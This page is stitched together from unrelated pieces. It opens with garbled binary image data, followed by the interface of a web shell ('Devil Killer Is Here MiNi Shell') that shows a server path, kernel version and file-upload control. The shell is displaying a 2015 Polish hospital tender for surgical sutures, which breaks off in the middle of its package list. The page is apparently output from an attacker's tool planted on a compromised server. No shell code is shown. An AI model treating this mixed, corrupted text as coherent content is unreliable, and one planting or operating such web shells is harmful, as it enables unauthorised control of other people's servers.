JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150723/187368-N-2015.html

<p class="kh_header"><b>Tarnowskie Góry: SUKCESYWNE DOSTAWY MATERIAŁÓW SZEWNYCH</b><br>
<b>Numer ogłoszenia: 187368 - 2015; data zamieszczenia: 23.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNE DOSTAWY MATERIAŁÓW SZEWNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są sukcesywne dostawy materiałów szewnych. Zamówienie składa się z 20 części tzw. pakietów, z których każdy stanowi oddzielny przedmiot zamówienia: 
Pakiet nr 1 - Nici wchłanialne 1
Pakiet nr 2 - Nici wchłanialne 2
Pakiet nr 3 - Nici wchłanialne 3
Pakiet nr 4 - Nici wchłanialne 4
Pakiet nr 5 - Nici wchłanialne 5
Pakiet nr 6 - Nici wchłanialne 6
Pakiet nr 7 - Nici niewchłanialne 1
Pakiet nr 8 - Nici niewchłanialne 2
Pakiet nr 9 - Nici niewchłanialne 3
Pakiet nr 10 - Nici niewchłanialne 4
Pakiet nr 11 - Nici niewchłanialne 5
Pakiet nr 12 - Nici okulistyczne 1
Pakiet nr 13 - Nici okulistyczne 2
Pakiet nr 14 - Nici okulistyczne 3
Pakiet nr 15 - Nici okulistyczne 4
Pakiet nr 16 - Nici okulistyczne 5
Pakiet nr 17 - Nici okulistyczne 6
Pakiet nr 18 - Nici okulistyczne 7
Pakiet nr 19 - Siatka przepuklinowa 1
Pakiet nr 20 - Siatka przepuklinowa 2
2.Szczegółowy opis przedmiotu zamówienia - asortyment oraz ilość znajdują się w załącznikach D do SIWZ  - FORMULARZ CENOWY - pakiety 1-20
3.Składane oferty muszą  zawierać pełny zakres przedmiotu zamówienia w danym pakiecie.
4.Wykonawca gwarantuje, że przedmiot i warunki realizacji zamówienia w  całym okresie wykonywania umowy będą posiadać aktualne świadectwa dopuszczenia do obrotu na rynku polskim zgodne z ustawą o wyrobach medycznych z dnia 20 maja 2010r.  (Dz. U. nr 107 poz. 679 z 20.05.2010r.) oraz z innymi obowiązującymi przepisami prawnymi w tym zakresie. Wszystkie oferowane produkty spełniają właściwe dla każdego z nich wymogi jakościowe co do opakowania i przechowywania oraz posiadają pozwolenie dopuszczające daną serię do obrotu wydawaną każdorazowo przez uprawniony organ.
5.Dostarczane produkty będą wysokiej jakości, o właściwych parametrach użytkowych i ważnym co najmniej 6 miesięcznym okresie przydatności do użycia.
6.Zamawiający zastrzega sobie prawo realizowania zamówień w ilościach uzależnionych od rzeczywistych potrzeb i posiadanych środków oraz do ograniczenia zamówienia w zakresie rzeczowym i ilościowym, co nie jest odstąpieniem od umowy nawet w części.
7.Zamawiający zastrzega sobie prawo do zmiany limitów ilościowych zamawianego asortymentu w stosunku do określonych w poszczególnych pozycjach pakietu, stanowiącego załącznik do umowy zarówno in plus jak i in minus, bez zmiany wartości brutto przedmiotu umowy określonej w § 2 ust. 1 projektu umowy, a Wykonawca wyraża na to zgodę..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- katalog oferowanego asortymentu lub inny dokument w języku polskim zawierający szczegółowy opis asortymentu potwierdzający zgodność oferowanego przedmiotu zamówienia z zamówieniem wymaganym przez  Zamawiającego (czas wchłaniania, skład itp.).  Wykonawca winien opisać dokument numerem pakietu i pozycji, którego dotyczy; - złożyć oświadczenie według załącznika [C] do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony szczegółowo formularz oferty - część [C] stanowiący załącznik do SIWZ
2. Wypełniony formularz cenowy - część [D] stanowiący załącznik do SIWZ
3. Wzór oświadczeń - część [E.1], [E.2]stanowiący załącznik do SIWZ
4. Wzór oświadczeń - część [F] stanowiący załącznik do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji dostaw Cito - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
2.  Strony dopuszczają zmiany umowy w zakresie:
    a)  zmiany stawki podatku od towarów i usług, gdzie zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.
    b)  zmiany cen urzędowych leków, wprowadzonych rozporządzeniem właściwego Ministra,          
3. Dopuszcza się zmianę umowy w zakresie przedmiotowym tj. zastąpienie produktu objętego umową  
    odpowiednikiem w przypadku:
    a)  zaprzestania wytwarzania produktu leczniczego objętego umową
    b)  wygaśnięcia świadectwa rejestracji
    c)  czasowego braku dostępności produktu leczniczego objętego umową
    Każda zmiana asortymentu wymaga wcześniejszego pisemnego lub telefonicznego (z potwierdzeniem    
   faksem) uzgodnienia. Osobą upoważnioną do takich uzgodnień lub do akceptacji równoważnego produktu 
   leczniczego ze strony Zamawiającego jest Kierownik Apteki Szpitalnej. Zmiany w tym zakresie nie wymagają 
   aneksów do umowy.
    d)  przedłożenia przez wykonawcę oferty korzystniejszej dla Zamawiającego 
4. Zmiana, o której mowa w ust. 3 będzie dopuszczalną pod warunkiem, iż odpowiednik będzie oparty   
    na  tej samej substancji aktywnej, znajduje zastosowanie w tych samych wskazaniach co lek objęty   
    umową  i przy cenie: 
    - w przypadkach wskazanych ust. 3 pkt. a-c nie wyższej niż cena leku objętego umową
    - w przypadku wskazanym ust. 3 pkt. d niższej od ceny leku objętego umową
5.  Zmiany, o których mowa w ust.3  mogą dotyczyć nadto sposobu konfekcjonowania leku i wielkości  jednostkowej dawki, z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową,
6.  Wszelkie powyższe zmiany po uprzedniej akceptacji osoby odpowiedzialnej merytorycznie za realizację przedmiotu zamówienia.
7.  Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul.Pyskowickiej 47-51 - Dział Zamówień Publicznych i Zaopatrzenia - budynek administracji..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2015 godzina 09:30, miejsce: Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul.Pyskowickiej 47-51 - Sekretariat, budynek administracji..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET NR 1 - NICI WCHŁANIALNE 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp UPS Opis igły kod nazwa długość nici /+10% Ilość saszetek w opakow. Zamawiana ilość opakow  Plecionka, syntetyczna, wchłanialna zbudowana z polimeru kwasu glikolowego i mlekowego, powlekana o okresie podtrzymywania tkanki 25% po 28 dniach i okresie całkowitego wchłonięcia szwu 56 do 70 dni.

1 3/0 podwiązka 150 24 1
2 2/0 podwiązka  150 24 72
3 2 podwiązka  150 24 112
4 1 podwiązka 150 24 64
5 0 podwiązka   150 24 4
6 3/0 okrągła 31mm + -2mm 1/2 koła 70 12 4
7 3/0 okrągła 17mm + -1mm  1/2 koła  70 12 8
8 2/0 okrągła 22mm + -2mm 1/2 koła  70 12 16
9 2/0 okrągła 26mm + -2mm 1 2 koła  70 12 52
10 2/0 okrągło-tnąca lub okrągła pogrubiona 40mm +/-2mm 1/2 koła 70 12 1
11 2/0 1/2 koła igła okrągła +/-2mm  31mm 90 36 54
12 2/0 1/2 koła okrągła 36mm  +/-2mm    70 12 120
13 2/0 1/2 koła igła okrągła +/-2mm  31mm  70 12 162
14 2/0 1/2 koła okrągła 36mm  +/-2mm  90 36 40
15 0 1/2 koła igła okrągła 36mm +/-2mm  90 12 132
16 0 okrągła 26mm +/-2mm   1/2 koła  70 12 8
17 0 okrągła 31mm +/-2mm  1/2 koła  70 12 44
18 1 okrągła 36mm +/-2mm   1/2 koła  90 12 76
19 1 okrągło-tnąca 40mm +/-3mm  1/2 koła  90 36 32
20 1 okrągła 48mm +/-3mm  1/2 koła  90 12 32
21 2 okrągła 40mm +/-2mm  1/2 koła pogrubiona 90 12 216
22 2 okrągła 48mm +/-3mm  1/2 koła  90 12 6
23 1 1/2 koła igła okrągła  31mm +/-2mm 70 12 1
24 1 1/2 koła igła okrągło-tnąca lub odwrotnie tnąca 31mm +/-2mm  70 12 1
25 4/0 1/2 koła igła okrągła 22mm +/-2mm  70 12 1
26 3/0 okrągła 26mm 1/2 koła 70 12 36
27 1 tępa 65mm 3/8 koła  100 24 4
28 0 1/2 koła okrągła 36mm  +/-2mm  pogrubiona 90 12 6
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR 2 - NICI WCHŁANIALNE 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły	kod	nazwa	długość nici /+10%	Ilość saszetek w opakow.	Zamawiana ilość opakow
Plecionka, syntetyczna, wchłanialna zbudowana z kwasu poliglikolowego powlekana, wchłanialna ok. 42 dni, o podtrzymywaniu tkanki : 10-14 dni
1	4/0	okrągła 26mm +/-1mm 1/2 koła	 	 	70	36	1
2	4/0	okrągła 22mm +/-1mm 1/2 koła	 	 	70	36	1
3	3/0	okrągła 26mm +/-1mm 1/2 koła	 	 	70	36	1
4	3/0	okrągła 22mm +/-2mm 1/2 koła	 	 	70	36	1
5	2/0	okrągła 26mm +/-1mm 1/2 koła	 	 	70	36	1
6	0	okrągła 26mm +/-1mm 1/2 koła	 	 	70	36	1
 
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET NR 3 - NICI WCHŁANIALNE 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły	kod	nazwa	długość nici /+10%	Ilość saszetek w opakow.	Zamawiana ilość opakow
Plecionka, syntetyczna, wchłanialna zbudowana z polimeru kwasu glikolowego i mlekowego, powlekana o okresie podtrzymywania tkanki ok..25% po 28 dniach i okresie całkowitego wchłonięcia szwu 56 do 70 dni.
1	2	okrągła rozwarstwiająca 48mm +/-3mm  1/2 koła 	 	 	90	36	36
2	3/0	okrągła rozwarstwiająca 26mm +/-3mm  1/2 koła 	 	 	75	12	15
3	2/0	okrągła rozwarstwiająca 26mm +/-3mm  1/2 koła 	 	 	75	12	30
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET NR 4 - NICI WCHŁANIALNE 4.</p>
